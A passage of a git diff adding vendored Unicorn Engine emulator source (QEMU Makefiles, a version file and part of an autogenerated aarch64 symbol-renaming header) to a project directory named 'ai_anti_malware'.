+ @exit 1 +endif +endif + +GENERATED_HEADERS = config-host.h + +# Don't try to regenerate Makefile or configure +# We don't generate any of them +Makefile: ; +configure: ; + +.PHONY: all clean distclean recurse-all + +$(call set-vpath, $(SRC_PATH)) + +SUBDIR_MAKEFLAGS=$(if $(V),,--no-print-directory) BUILD_DIR=$(BUILD_DIR) +SUBDIR_DEVICES_MAK=$(patsubst %, %/config-devices.mak, $(TARGET_DIRS)) +SUBDIR_DEVICES_MAK_DEP=$(patsubst %, %-config-devices.mak.d, $(TARGET_DIRS)) + +ifeq ($(SUBDIR_DEVICES_MAK),) +config-all-devices.mak: + $(call quiet-command,echo '# no devices' > $@," GEN $@") +else +config-all-devices.mak: $(SUBDIR_DEVICES_MAK) + $(call quiet-command, sed -n \ + 's|^\([^=]*\)=\(.*\)$$|\1:=$$(findstring y,$$(\1)\2)|p' \ + $(SUBDIR_DEVICES_MAK) | sort -u > $@, \ + " GEN $@") +endif + +-include $(SUBDIR_DEVICES_MAK_DEP) + +%/config-devices.mak: default-configs/%.mak + $(call quiet-command, cp $< $@, " GEN $@") + +ifneq ($(wildcard config-host.mak),) +include $(SRC_PATH)/Makefile.objs +endif + +dummy := $(call unnest-vars,,util-obj-y common-obj-y) + +all: recurse-all + +config-host.h: config-host.h-timestamp +config-host.h-timestamp: config-host.mak + +SUBDIR_RULES=$(patsubst %,subdir-%, $(TARGET_DIRS)) +SOFTMMU_SUBDIR_RULES=$(filter %-softmmu,$(SUBDIR_RULES)) + +$(SOFTMMU_SUBDIR_RULES): config-all-devices.mak + +subdir-%: + $(call quiet-command,$(MAKE) $(SUBDIR_MAKEFLAGS) -C $* V="$(V)" TARGET_DIR="$*/" all,) + +$(SUBDIR_RULES): qapi-types.c qapi-types.h qapi-visit.c qapi-visit.h $(common-obj-y) $(util-obj-y) + +recurse-all: $(SUBDIR_RULES) + +###################################################################### + +clean: + find . 
\( -name '*.l[oa]' -o -name '*.so' -o -name '*.dll' -o -name '*.mo' -o -name '*.[oda]' \) -type f -exec rm {} + + rm -f TAGS *~ */*~ + @# May not be present in GENERATED_HEADERS + rm -f $(foreach f,$(GENERATED_HEADERS),$(f) $(f)-timestamp) + for d in $(TARGET_DIRS); do \ + if test -d $$d; then $(MAKE) -C $$d $@ || exit 1; fi; \ + done + +distclean: clean + rm -f config-host.mak config-host.h* + rm -f config-all-devices.mak + rm -f config.log config.status + for d in $(TARGET_DIRS); do \ + rm -rf $$d || exit 1 ; \ + done + + +# Add a dependency on the generated files, so that they are always +# rebuilt before other object files +ifneq ($(filter-out %clean,$(MAKECMDGOALS)),$(if $(MAKECMDGOALS),,fail)) +Makefile: $(GENERATED_HEADERS) +endif + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.objs new file mode 100644 index 0000000..fcf5f30 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.objs @@ -0,0 +1,12 @@ +####################################################################### +# Common libraries for tools and emulators +util-obj-y = util/ qobject/ qapi/ qapi-types.o qapi-visit.o + +common-obj-y += hw/ +common-obj-y += accel.o +common-obj-y += vl.o qemu-timer.o +common-obj-y += ../uc.o ../list.o glib_compat.o +common-obj-y += qemu-log.o +common-obj-y += tcg-runtime.o +common-obj-y += hw/ +common-obj-y += qom/ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.target b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.target new file mode 100644 index 0000000..356ce1c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.target @@ -0,0 +1,84 @@ +# -*- Mode: makefile -*- + +include ../config-host.mak +include config-target.mak +include config-devices.mak +include $(SRC_PATH)/rules.mak + +$(call set-vpath, $(SRC_PATH)) +QEMU_CFLAGS += -I.. 
-I$(SRC_PATH)/target-$(TARGET_BASE_ARCH) -DNEED_CPU_H + +QEMU_CFLAGS+=-I$(SRC_PATH)/include + +# system emulator name +QEMU_PROG=qemu-system-$(TARGET_NAME)$(EXESUF) + +config-target.h: config-target.h-timestamp +config-target.h-timestamp: config-target.mak + +all: $(QEMU_PROG) + +######################################################### +# cpu emulator library +obj-y = exec.o translate-all.o cpu-exec.o +obj-y += tcg/tcg.o tcg/optimize.o +obj-y += fpu/softfloat.o +obj-y += target-$(TARGET_BASE_ARCH)/ + +######################################################### +# System emulator target +obj-y += cpus.o ioport.o +obj-y += hw/ +obj-y += memory.o cputlb.o +obj-y += memory_mapping.o + +# Hardware support +ifeq ($(TARGET_NAME), sparc64) +obj-y += hw/sparc64/ +else +obj-y += hw/$(TARGET_BASE_ARCH)/ +endif + +# Workaround for http://gcc.gnu.org/PR55489, see configure. +%/translate.o: QEMU_CFLAGS += $(TRANSLATE_OPT_CFLAGS) + +dummy := $(call unnest-vars,,obj-y) +all-obj-y := $(obj-y) + +common-obj-y := +include $(SRC_PATH)/Makefile.objs + +dummy := $(call unnest-vars,..,util-obj-y) + +target-obj-y-save := $(target-obj-y) $(util-obj-y) + +dummy := $(call unnest-vars,..,common-obj-y) + +target-obj-y := $(target-obj-y-save) +all-obj-y += $(common-obj-y) +all-obj-y += $(target-obj-y) + +# determine shared lib extension +IS_APPLE := $(shell $(CC) -dM -E - < /dev/null | grep __apple_build_version__ | wc -l | tr -d " ") +ifeq ($(IS_APPLE),1) +EXT = dylib +else +# Cygwin? +IS_CYGWIN := $(shell $(CC) -dumpmachine | grep -i cygwin | wc -l) +ifeq ($(IS_CYGWIN),1) +EXT = dll +else +EXT = so +endif +endif + +# build either PROG or PROGW +$(QEMU_PROG): $(all-obj-y) + +clean: + rm -f *.a *~ $(QEMU_PROG) + rm -f $(shell find . 
-name '*.[od]') + +GENERATED_HEADERS += config-target.h +Makefile: $(GENERATED_HEADERS) + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/VERSION b/ai_anti_malware/unicorn/unicorn-master/qemu/VERSION new file mode 100644 index 0000000..c043eea --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/VERSION @@ -0,0 +1 @@ +2.2.1 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64.h b/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64.h new file mode 100644 index 0000000..470a62d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64.h @@ -0,0 +1,3056 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_AARCH64_H +#define UNICORN_AUTOGEN_AARCH64_H +#define arm_release arm_release_aarch64 +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_aarch64 +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_aarch64 +#define use_idiv_instructions_rt use_idiv_instructions_rt_aarch64 +#define tcg_target_deposit_valid tcg_target_deposit_valid_aarch64 +#define helper_power_down helper_power_down_aarch64 +#define check_exit_request check_exit_request_aarch64 +#define address_space_unregister address_space_unregister_aarch64 +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_aarch64 +#define phys_mem_clean phys_mem_clean_aarch64 +#define tb_cleanup tb_cleanup_aarch64 +#define memory_map memory_map_aarch64 +#define memory_map_ptr memory_map_ptr_aarch64 +#define memory_unmap memory_unmap_aarch64 +#define memory_free memory_free_aarch64 +#define free_code_gen_buffer free_code_gen_buffer_aarch64 +#define helper_raise_exception helper_raise_exception_aarch64 +#define tcg_enabled tcg_enabled_aarch64 +#define tcg_exec_init tcg_exec_init_aarch64 +#define memory_register_types memory_register_types_aarch64 +#define cpu_exec_init_all cpu_exec_init_all_aarch64 +#define vm_start vm_start_aarch64 +#define resume_all_vcpus resume_all_vcpus_aarch64 +#define a15_l2ctlr_read a15_l2ctlr_read_aarch64 
+#define a64_translate_init a64_translate_init_aarch64 +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_aarch64 +#define aa64_cacheop_access aa64_cacheop_access_aarch64 +#define aa64_daif_access aa64_daif_access_aarch64 +#define aa64_daif_write aa64_daif_write_aarch64 +#define aa64_dczid_read aa64_dczid_read_aarch64 +#define aa64_fpcr_read aa64_fpcr_read_aarch64 +#define aa64_fpcr_write aa64_fpcr_write_aarch64 +#define aa64_fpsr_read aa64_fpsr_read_aarch64 +#define aa64_fpsr_write aa64_fpsr_write_aarch64 +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_aarch64 +#define aa64_zva_access aa64_zva_access_aarch64 +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_aarch64 +#define aarch64_restore_sp aarch64_restore_sp_aarch64 +#define aarch64_save_sp aarch64_save_sp_aarch64 +#define accel_find accel_find_aarch64 +#define accel_init_machine accel_init_machine_aarch64 +#define accel_type accel_type_aarch64 +#define access_with_adjusted_size access_with_adjusted_size_aarch64 +#define add128 add128_aarch64 +#define add16_sat add16_sat_aarch64 +#define add16_usat add16_usat_aarch64 +#define add192 add192_aarch64 +#define add8_sat add8_sat_aarch64 +#define add8_usat add8_usat_aarch64 +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_aarch64 +#define add_cpreg_to_list add_cpreg_to_list_aarch64 +#define addFloat128Sigs addFloat128Sigs_aarch64 +#define addFloat32Sigs addFloat32Sigs_aarch64 +#define addFloat64Sigs addFloat64Sigs_aarch64 +#define addFloatx80Sigs addFloatx80Sigs_aarch64 +#define add_qemu_ldst_label add_qemu_ldst_label_aarch64 +#define address_space_access_valid address_space_access_valid_aarch64 +#define address_space_destroy address_space_destroy_aarch64 +#define address_space_destroy_dispatch address_space_destroy_dispatch_aarch64 +#define address_space_get_flatview address_space_get_flatview_aarch64 +#define address_space_init address_space_init_aarch64 +#define address_space_init_dispatch 
address_space_init_dispatch_aarch64 +#define address_space_lookup_region address_space_lookup_region_aarch64 +#define address_space_map address_space_map_aarch64 +#define address_space_read address_space_read_aarch64 +#define address_space_rw address_space_rw_aarch64 +#define address_space_translate address_space_translate_aarch64 +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_aarch64 +#define address_space_translate_internal address_space_translate_internal_aarch64 +#define address_space_unmap address_space_unmap_aarch64 +#define address_space_update_topology address_space_update_topology_aarch64 +#define address_space_update_topology_pass address_space_update_topology_pass_aarch64 +#define address_space_write address_space_write_aarch64 +#define addrrange_contains addrrange_contains_aarch64 +#define addrrange_end addrrange_end_aarch64 +#define addrrange_equal addrrange_equal_aarch64 +#define addrrange_intersection addrrange_intersection_aarch64 +#define addrrange_intersects addrrange_intersects_aarch64 +#define addrrange_make addrrange_make_aarch64 +#define adjust_endianness adjust_endianness_aarch64 +#define all_helpers all_helpers_aarch64 +#define alloc_code_gen_buffer alloc_code_gen_buffer_aarch64 +#define alloc_entry alloc_entry_aarch64 +#define always_true always_true_aarch64 +#define arm1026_initfn arm1026_initfn_aarch64 +#define arm1136_initfn arm1136_initfn_aarch64 +#define arm1136_r2_initfn arm1136_r2_initfn_aarch64 +#define arm1176_initfn arm1176_initfn_aarch64 +#define arm11mpcore_initfn arm11mpcore_initfn_aarch64 +#define arm926_initfn arm926_initfn_aarch64 +#define arm946_initfn arm946_initfn_aarch64 +#define arm_ccnt_enabled arm_ccnt_enabled_aarch64 +#define arm_cp_read_zero arm_cp_read_zero_aarch64 +#define arm_cp_reset_ignore arm_cp_reset_ignore_aarch64 +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_aarch64 +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_aarch64 +#define arm_cpu_finalizefn 
arm_cpu_finalizefn_aarch64 +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_aarch64 +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_aarch64 +#define arm_cpu_initfn arm_cpu_initfn_aarch64 +#define arm_cpu_list arm_cpu_list_aarch64 +#define cpu_loop_exit cpu_loop_exit_aarch64 +#define arm_cpu_post_init arm_cpu_post_init_aarch64 +#define arm_cpu_realizefn arm_cpu_realizefn_aarch64 +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_aarch64 +#define arm_cpu_register_types arm_cpu_register_types_aarch64 +#define cpu_resume_from_signal cpu_resume_from_signal_aarch64 +#define arm_cpus arm_cpus_aarch64 +#define arm_cpu_set_pc arm_cpu_set_pc_aarch64 +#define arm_cp_write_ignore arm_cp_write_ignore_aarch64 +#define arm_current_el arm_current_el_aarch64 +#define arm_dc_feature arm_dc_feature_aarch64 +#define arm_debug_excp_handler arm_debug_excp_handler_aarch64 +#define arm_debug_target_el arm_debug_target_el_aarch64 +#define arm_el_is_aa64 arm_el_is_aa64_aarch64 +#define arm_env_get_cpu arm_env_get_cpu_aarch64 +#define arm_excp_target_el arm_excp_target_el_aarch64 +#define arm_excp_unmasked arm_excp_unmasked_aarch64 +#define arm_feature arm_feature_aarch64 +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_aarch64 +#define gen_intermediate_code gen_intermediate_code_aarch64 +#define gen_intermediate_code_pc gen_intermediate_code_pc_aarch64 +#define arm_gen_test_cc arm_gen_test_cc_aarch64 +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_aarch64 +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_aarch64 +#define arm_handle_psci_call arm_handle_psci_call_aarch64 +#define arm_is_psci_call arm_is_psci_call_aarch64 +#define arm_is_secure arm_is_secure_aarch64 +#define arm_is_secure_below_el3 arm_is_secure_below_el3_aarch64 +#define arm_ldl_code arm_ldl_code_aarch64 +#define arm_lduw_code arm_lduw_code_aarch64 +#define arm_log_exception arm_log_exception_aarch64 +#define arm_reg_read arm_reg_read_aarch64 +#define 
arm_reg_reset arm_reg_reset_aarch64 +#define arm_reg_write arm_reg_write_aarch64 +#define restore_state_to_opc restore_state_to_opc_aarch64 +#define arm_rmode_to_sf arm_rmode_to_sf_aarch64 +#define arm_singlestep_active arm_singlestep_active_aarch64 +#define tlb_fill tlb_fill_aarch64 +#define tlb_flush tlb_flush_aarch64 +#define tlb_flush_page tlb_flush_page_aarch64 +#define tlb_set_page tlb_set_page_aarch64 +#define arm_translate_init arm_translate_init_aarch64 +#define arm_v7m_class_init arm_v7m_class_init_aarch64 +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_aarch64 +#define ats_access ats_access_aarch64 +#define ats_write ats_write_aarch64 +#define bad_mode_switch bad_mode_switch_aarch64 +#define bank_number bank_number_aarch64 +#define bitmap_zero_extend bitmap_zero_extend_aarch64 +#define bp_wp_matches bp_wp_matches_aarch64 +#define breakpoint_invalidate breakpoint_invalidate_aarch64 +#define build_page_bitmap build_page_bitmap_aarch64 +#define bus_add_child bus_add_child_aarch64 +#define bus_class_init bus_class_init_aarch64 +#define bus_info bus_info_aarch64 +#define bus_unparent bus_unparent_aarch64 +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_aarch64 +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_aarch64 +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_aarch64 +#define call_recip_estimate call_recip_estimate_aarch64 +#define can_merge can_merge_aarch64 +#define capacity_increase capacity_increase_aarch64 +#define ccsidr_read ccsidr_read_aarch64 +#define check_ap check_ap_aarch64 +#define check_breakpoints check_breakpoints_aarch64 +#define check_watchpoints check_watchpoints_aarch64 +#define cho cho_aarch64 +#define clear_bit clear_bit_aarch64 +#define clz32 clz32_aarch64 +#define clz64 clz64_aarch64 +#define cmp_flatrange_addr cmp_flatrange_addr_aarch64 +#define code_gen_alloc code_gen_alloc_aarch64 +#define commonNaNToFloat128 commonNaNToFloat128_aarch64 +#define commonNaNToFloat16 
commonNaNToFloat16_aarch64 +#define commonNaNToFloat32 commonNaNToFloat32_aarch64 +#define commonNaNToFloat64 commonNaNToFloat64_aarch64 +#define commonNaNToFloatx80 commonNaNToFloatx80_aarch64 +#define compute_abs_deadline compute_abs_deadline_aarch64 +#define cond_name cond_name_aarch64 +#define configure_accelerator configure_accelerator_aarch64 +#define container_get container_get_aarch64 +#define container_info container_info_aarch64 +#define container_register_types container_register_types_aarch64 +#define contextidr_write contextidr_write_aarch64 +#define core_log_global_start core_log_global_start_aarch64 +#define core_log_global_stop core_log_global_stop_aarch64 +#define core_memory_listener core_memory_listener_aarch64 +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_aarch64 +#define cortex_a15_initfn cortex_a15_initfn_aarch64 +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_aarch64 +#define cortex_a8_initfn cortex_a8_initfn_aarch64 +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_aarch64 +#define cortex_a9_initfn cortex_a9_initfn_aarch64 +#define cortex_m3_initfn cortex_m3_initfn_aarch64 +#define count_cpreg count_cpreg_aarch64 +#define countLeadingZeros32 countLeadingZeros32_aarch64 +#define countLeadingZeros64 countLeadingZeros64_aarch64 +#define cp_access_ok cp_access_ok_aarch64 +#define cpacr_write cpacr_write_aarch64 +#define cpreg_field_is_64bit cpreg_field_is_64bit_aarch64 +#define cp_reginfo cp_reginfo_aarch64 +#define cpreg_key_compare cpreg_key_compare_aarch64 +#define cpreg_make_keylist cpreg_make_keylist_aarch64 +#define cp_reg_reset cp_reg_reset_aarch64 +#define cpreg_to_kvm_id cpreg_to_kvm_id_aarch64 +#define cpsr_read cpsr_read_aarch64 +#define cpsr_write cpsr_write_aarch64 +#define cptype_valid cptype_valid_aarch64 +#define cpu_abort cpu_abort_aarch64 +#define cpu_arm_exec cpu_arm_exec_aarch64 +#define cpu_arm_gen_code cpu_arm_gen_code_aarch64 +#define cpu_arm_init cpu_arm_init_aarch64 +#define cpu_breakpoint_insert 
cpu_breakpoint_insert_aarch64 +#define cpu_breakpoint_remove cpu_breakpoint_remove_aarch64 +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_aarch64 +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_aarch64 +#define cpu_can_do_io cpu_can_do_io_aarch64 +#define cpu_can_run cpu_can_run_aarch64 +#define cpu_class_init cpu_class_init_aarch64 +#define cpu_common_class_by_name cpu_common_class_by_name_aarch64 +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_aarch64 +#define cpu_common_get_arch_id cpu_common_get_arch_id_aarch64 +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_aarch64 +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_aarch64 +#define cpu_common_has_work cpu_common_has_work_aarch64 +#define cpu_common_initfn cpu_common_initfn_aarch64 +#define cpu_common_noop cpu_common_noop_aarch64 +#define cpu_common_parse_features cpu_common_parse_features_aarch64 +#define cpu_common_realizefn cpu_common_realizefn_aarch64 +#define cpu_common_reset cpu_common_reset_aarch64 +#define cpu_dump_statistics cpu_dump_statistics_aarch64 +#define cpu_exec_init cpu_exec_init_aarch64 +#define cpu_flush_icache_range cpu_flush_icache_range_aarch64 +#define cpu_gen_init cpu_gen_init_aarch64 +#define cpu_get_clock cpu_get_clock_aarch64 +#define cpu_get_real_ticks cpu_get_real_ticks_aarch64 +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_aarch64 +#define cpu_handle_debug_exception cpu_handle_debug_exception_aarch64 +#define cpu_handle_guest_debug cpu_handle_guest_debug_aarch64 +#define cpu_inb cpu_inb_aarch64 +#define cpu_inl cpu_inl_aarch64 +#define cpu_interrupt cpu_interrupt_aarch64 +#define cpu_interrupt_handler cpu_interrupt_handler_aarch64 +#define cpu_inw cpu_inw_aarch64 +#define cpu_io_recompile cpu_io_recompile_aarch64 +#define cpu_is_stopped cpu_is_stopped_aarch64 +#define cpu_ldl_code cpu_ldl_code_aarch64 +#define cpu_ldub_code cpu_ldub_code_aarch64 +#define cpu_lduw_code cpu_lduw_code_aarch64 
+#define cpu_memory_rw_debug cpu_memory_rw_debug_aarch64 +#define cpu_mmu_index cpu_mmu_index_aarch64 +#define cpu_outb cpu_outb_aarch64 +#define cpu_outl cpu_outl_aarch64 +#define cpu_outw cpu_outw_aarch64 +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_aarch64 +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_aarch64 +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_aarch64 +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_aarch64 +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_aarch64 +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_aarch64 +#define cpu_physical_memory_map cpu_physical_memory_map_aarch64 +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_aarch64 +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_aarch64 +#define cpu_physical_memory_rw cpu_physical_memory_rw_aarch64 +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_aarch64 +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_aarch64 +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_aarch64 +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_aarch64 +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_aarch64 +#define cpu_register cpu_register_aarch64 +#define cpu_register_types cpu_register_types_aarch64 +#define cpu_restore_state cpu_restore_state_aarch64 +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_aarch64 +#define cpu_single_step cpu_single_step_aarch64 +#define cpu_tb_exec cpu_tb_exec_aarch64 +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_aarch64 +#define cpu_to_be64 cpu_to_be64_aarch64 +#define cpu_to_le32 cpu_to_le32_aarch64 +#define cpu_to_le64 cpu_to_le64_aarch64 +#define cpu_type_info cpu_type_info_aarch64 +#define cpu_unassigned_access 
cpu_unassigned_access_aarch64 +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_aarch64 +#define cpu_watchpoint_insert cpu_watchpoint_insert_aarch64 +#define cpu_watchpoint_remove cpu_watchpoint_remove_aarch64 +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_aarch64 +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_aarch64 +#define crc32c_table crc32c_table_aarch64 +#define create_new_memory_mapping create_new_memory_mapping_aarch64 +#define csselr_write csselr_write_aarch64 +#define cto32 cto32_aarch64 +#define ctr_el0_access ctr_el0_access_aarch64 +#define ctz32 ctz32_aarch64 +#define ctz64 ctz64_aarch64 +#define dacr_write dacr_write_aarch64 +#define dbgbcr_write dbgbcr_write_aarch64 +#define dbgbvr_write dbgbvr_write_aarch64 +#define dbgwcr_write dbgwcr_write_aarch64 +#define dbgwvr_write dbgwvr_write_aarch64 +#define debug_cp_reginfo debug_cp_reginfo_aarch64 +#define debug_frame debug_frame_aarch64 +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_aarch64 +#define define_arm_cp_regs define_arm_cp_regs_aarch64 +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_aarch64 +#define define_debug_regs define_debug_regs_aarch64 +#define define_one_arm_cp_reg define_one_arm_cp_reg_aarch64 +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_aarch64 +#define deposit32 deposit32_aarch64 +#define deposit64 deposit64_aarch64 +#define deregister_tm_clones deregister_tm_clones_aarch64 +#define device_class_base_init device_class_base_init_aarch64 +#define device_class_init device_class_init_aarch64 +#define device_finalize device_finalize_aarch64 +#define device_get_realized device_get_realized_aarch64 +#define device_initfn device_initfn_aarch64 +#define device_post_init device_post_init_aarch64 +#define device_reset device_reset_aarch64 +#define device_set_realized device_set_realized_aarch64 +#define device_type_info device_type_info_aarch64 +#define disas_arm_insn 
disas_arm_insn_aarch64 +#define disas_coproc_insn disas_coproc_insn_aarch64 +#define disas_dsp_insn disas_dsp_insn_aarch64 +#define disas_iwmmxt_insn disas_iwmmxt_insn_aarch64 +#define disas_neon_data_insn disas_neon_data_insn_aarch64 +#define disas_neon_ls_insn disas_neon_ls_insn_aarch64 +#define disas_thumb2_insn disas_thumb2_insn_aarch64 +#define disas_thumb_insn disas_thumb_insn_aarch64 +#define disas_vfp_insn disas_vfp_insn_aarch64 +#define disas_vfp_v8_insn disas_vfp_v8_insn_aarch64 +#define do_arm_semihosting do_arm_semihosting_aarch64 +#define do_clz16 do_clz16_aarch64 +#define do_clz8 do_clz8_aarch64 +#define do_constant_folding do_constant_folding_aarch64 +#define do_constant_folding_2 do_constant_folding_2_aarch64 +#define do_constant_folding_cond do_constant_folding_cond_aarch64 +#define do_constant_folding_cond2 do_constant_folding_cond2_aarch64 +#define do_constant_folding_cond_32 do_constant_folding_cond_32_aarch64 +#define do_constant_folding_cond_64 do_constant_folding_cond_64_aarch64 +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_aarch64 +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_aarch64 +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_aarch64 +#define do_ssat do_ssat_aarch64 +#define do_usad do_usad_aarch64 +#define do_usat do_usat_aarch64 +#define do_v7m_exception_exit do_v7m_exception_exit_aarch64 +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_aarch64 +#define dummy_func dummy_func_aarch64 +#define dummy_section dummy_section_aarch64 +#define _DYNAMIC _DYNAMIC_aarch64 +#define _edata _edata_aarch64 +#define _end _end_aarch64 +#define end_list end_list_aarch64 +#define eq128 eq128_aarch64 +#define ErrorClass_lookup ErrorClass_lookup_aarch64 +#define error_copy error_copy_aarch64 +#define error_exit error_exit_aarch64 +#define error_get_class error_get_class_aarch64 +#define error_get_pretty error_get_pretty_aarch64 +#define error_setg_file_open error_setg_file_open_aarch64 +#define estimateDiv128To64 
estimateDiv128To64_aarch64 +#define estimateSqrt32 estimateSqrt32_aarch64 +#define excnames excnames_aarch64 +#define excp_is_internal excp_is_internal_aarch64 +#define extended_addresses_enabled extended_addresses_enabled_aarch64 +#define extended_mpu_ap_bits extended_mpu_ap_bits_aarch64 +#define extract32 extract32_aarch64 +#define extract64 extract64_aarch64 +#define extractFloat128Exp extractFloat128Exp_aarch64 +#define extractFloat128Frac0 extractFloat128Frac0_aarch64 +#define extractFloat128Frac1 extractFloat128Frac1_aarch64 +#define extractFloat128Sign extractFloat128Sign_aarch64 +#define extractFloat16Exp extractFloat16Exp_aarch64 +#define extractFloat16Frac extractFloat16Frac_aarch64 +#define extractFloat16Sign extractFloat16Sign_aarch64 +#define extractFloat32Exp extractFloat32Exp_aarch64 +#define extractFloat32Frac extractFloat32Frac_aarch64 +#define extractFloat32Sign extractFloat32Sign_aarch64 +#define extractFloat64Exp extractFloat64Exp_aarch64 +#define extractFloat64Frac extractFloat64Frac_aarch64 +#define extractFloat64Sign extractFloat64Sign_aarch64 +#define extractFloatx80Exp extractFloatx80Exp_aarch64 +#define extractFloatx80Frac extractFloatx80Frac_aarch64 +#define extractFloatx80Sign extractFloatx80Sign_aarch64 +#define fcse_write fcse_write_aarch64 +#define find_better_copy find_better_copy_aarch64 +#define find_default_machine find_default_machine_aarch64 +#define find_desc_by_name find_desc_by_name_aarch64 +#define find_first_bit find_first_bit_aarch64 +#define find_paging_enabled_cpu find_paging_enabled_cpu_aarch64 +#define find_ram_block find_ram_block_aarch64 +#define find_ram_offset find_ram_offset_aarch64 +#define find_string find_string_aarch64 +#define find_type find_type_aarch64 +#define _fini _fini_aarch64 +#define flatrange_equal flatrange_equal_aarch64 +#define flatview_destroy flatview_destroy_aarch64 +#define flatview_init flatview_init_aarch64 +#define flatview_insert flatview_insert_aarch64 +#define flatview_lookup 
flatview_lookup_aarch64 +#define flatview_ref flatview_ref_aarch64 +#define flatview_simplify flatview_simplify_aarch64 +#define flatview_unref flatview_unref_aarch64 +#define float128_add float128_add_aarch64 +#define float128_compare float128_compare_aarch64 +#define float128_compare_internal float128_compare_internal_aarch64 +#define float128_compare_quiet float128_compare_quiet_aarch64 +#define float128_default_nan float128_default_nan_aarch64 +#define float128_div float128_div_aarch64 +#define float128_eq float128_eq_aarch64 +#define float128_eq_quiet float128_eq_quiet_aarch64 +#define float128_is_quiet_nan float128_is_quiet_nan_aarch64 +#define float128_is_signaling_nan float128_is_signaling_nan_aarch64 +#define float128_le float128_le_aarch64 +#define float128_le_quiet float128_le_quiet_aarch64 +#define float128_lt float128_lt_aarch64 +#define float128_lt_quiet float128_lt_quiet_aarch64 +#define float128_maybe_silence_nan float128_maybe_silence_nan_aarch64 +#define float128_mul float128_mul_aarch64 +#define float128_rem float128_rem_aarch64 +#define float128_round_to_int float128_round_to_int_aarch64 +#define float128_scalbn float128_scalbn_aarch64 +#define float128_sqrt float128_sqrt_aarch64 +#define float128_sub float128_sub_aarch64 +#define float128ToCommonNaN float128ToCommonNaN_aarch64 +#define float128_to_float32 float128_to_float32_aarch64 +#define float128_to_float64 float128_to_float64_aarch64 +#define float128_to_floatx80 float128_to_floatx80_aarch64 +#define float128_to_int32 float128_to_int32_aarch64 +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_aarch64 +#define float128_to_int64 float128_to_int64_aarch64 +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_aarch64 +#define float128_unordered float128_unordered_aarch64 +#define float128_unordered_quiet float128_unordered_quiet_aarch64 +#define float16_default_nan float16_default_nan_aarch64 +#define float16_is_quiet_nan float16_is_quiet_nan_aarch64 
